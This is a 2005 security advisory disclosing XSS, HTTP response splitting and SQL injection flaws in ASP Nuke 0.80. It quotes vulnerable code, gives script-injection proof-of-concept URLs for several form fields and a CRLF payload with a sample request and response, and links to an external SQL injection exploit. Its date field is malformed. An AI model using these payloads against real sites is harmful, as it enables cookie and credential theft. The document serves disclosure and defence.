M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80

Published: 26 16 2005
Released: 26 16 2005
Name: ASP Nuke
Affected Systems: <= 0.80
Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection
Author: Alberto Trivero
Vendor: http://www.aspnuke.com/



Software Description

***********


"ASP Nuke is an open-source software application for running a community-based web site on
a web server. By open-source, we mean the code is freely available for others to read, modify
and use in accordance with the software license. ASP Nuke is an extensible framework that
allows you to upgrade and add applications to the website quickly and easily. It uses a
modular architecture allowing others to rapidly develop new modules and site operators to
re-organize the layout and navigation for their site."



Cross-Site Scripting (XSS)

***********


Let's look at code from /module/account/register/forgot_password.asp at line 33 and 103:

    <?
    ...
    sEmail = steForm("Email")
    ...
    <TR>
	<TD class="forml">
	<% steTxt "E-Mail" %> (req)<BR>
	<INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22" MAXLENGTH="80" class="form">
	</TD>
    </TR>
    <TR>
    ...
    ?>

As we can see there isn't any control on the 'email' parameter when the board get it's value.
Since the value of the parameter is put in the HTML page as is, an attacker can do an XSS
attack with an URL like this:

    http://www.example.com/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

On the same line there are others parameters that aren't properly sanitised. These are some
PoC URLs:

    http://www.example.com/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E



HTTP Response Splitting

***********


Let's look at code from /module/support/language/language_select.asp at line 31:

    <?
    ...
    If steForm("action") = "go" Then
        ' make sure the required fields are present
        If Trim(steForm("LangCode")) = "" Then
            sErrorMsg = steGetText("Please select a language from the list below")
        Else
            ' redirect to the language administration
            Response.Redirect "tran_list.asp?langcode=" & steEncForm("LangCode")
        End If
    End If
    ...
    ?>

When the redirect, that this piece of code do, happend, it's possibile to do a CRLF injection
attack thanks to an unexisting sanitisation. This is a Poc URL:

    http://www.example.com/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

These are examples of HTTP headers:

    Request:
        POST /module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue HTTP/1.0
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
        Host: www.aspnuke.com
        Content-Length: 90
        Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
        Connection: Close

    Response:
        HTTP/1.1 302 Object moved
        Server: Microsoft-IIS/5.0
        Date: Sun, 15 May 2005 11:31:37 GMT
        Pragma: no-cache
        Location: tran_list.asp?langcode=trivero
        Set-Cookie: some=value
        Connection: Keep-Alive
        Content-Length: 121
        Content-Type: text/html
        Expires: Sun, 15 May 2005 11:30:38 GMT
        Cache-control: no-cache



SQL Injection

***********


Let's look at code from /module/support/task/comment_post.asp at line 36 and 75:

    <?
    ...
    nTaskID = steNForm("TaskID")
    ...
    If sErrorMsg = "" Then
        ' prevent dup posting here
        sStat = "SELECT	TaskID " &_
            "FROM	tblTaskComment " &_
            "WHERE	TaskID = " & nTaskID & " " &_
            "AND	Subject = '" & Replace(sSubject, "'", "''") & "' " &_
            "AND	Body LIKE '" & Replace(sBody, "'", "''") & "'"
    ...
    ?>

As we can see there isn't any control on the 'TaskID' parameter when the board get it's value.
Since the value of the parameter is put in the SQL query without sanitisation, an attacker
can do an SQL injection attack. I've made an exploit for this vulnerability that it's able
to recover the admin's username and the SHA256 hash of his password available at this address:
http://albythebest.altervista.org/aspnuke.pl



Solution

***********


The vendor has been contacted many times but a patch was not yet produced.



Alberto Trivero - trivero@jumpy.it
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group